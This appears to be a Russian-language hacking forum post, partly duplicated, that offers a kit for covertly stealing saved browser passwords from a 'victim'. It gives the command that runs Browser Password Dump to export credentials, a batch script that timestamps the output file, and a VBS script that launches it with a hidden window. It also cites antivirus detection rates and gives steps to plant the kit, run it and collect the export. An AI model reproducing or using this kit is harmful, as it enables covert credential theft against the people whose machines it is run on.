Для этого используем консольную
C:\Users\Public\BPD.exe -f "C:\Users\Public\%now%.txt"
- обратите внимание что все пути должные быть прописаны как абсолютные! Иначе не будет работать.
-установка даты - чисто для удобства, чтобы файл имел уникалное название.
-путь тоже абсолютный
Имейте в виду что Browser Password Dump стал палиться
BPD.exe (12/35)
test.bat (0/35)
test.vbs(0/35)
Использование:
1)Закидываем жертве, предварительно прописав пути в скриптах
2)Запускаем test.vbs, запускать от имени системы НЕ НУЖНО, иначе файл экспорта будет пустым. Запускаем как есть, без дополнительных опций.
3)Забираем экспорт
Прикрепляю архив со всем вышеперечисленным
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
, батник и vbs скрипт для скрытого запуска.
Код:
test.bat:
Код:
rem Estimate date/time in format YYYYMMDD_hhmmss
set now=%TIME:~0,-3%
set now=%now::=%
set now=%now: =0%
set now=%DATE:~-4%%DATE:~3,2%%DATE:~0,2%_%now%
- обратите внимание что все пути должные быть прописаны как абсолютные! Иначе не будет работать.
-установка даты - чисто для удобства, чтобы файл имел уникалное название.
Код:
test.vbs
Код:
Dim oShell
Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run "C:\Users\Public\test.bat", 0
Set oShell = Nothing
Имейте в виду что Browser Password Dump стал палиться
BPD.exe (12/35)
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
test.bat (0/35)
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
test.vbs(0/35)
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Использование:
1)Закидываем жертве, предварительно прописав пути в скриптах
2)Запускаем test.vbs, запускать от имени системы НЕ НУЖНО, иначе файл экспорта будет пустым. Запускаем как есть, без дополнительных опций.
3)Забираем экспорт
Прикрепляю архив со всем вышеперечисленным
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Ставить хайд не вижу смысла, так как все паблик.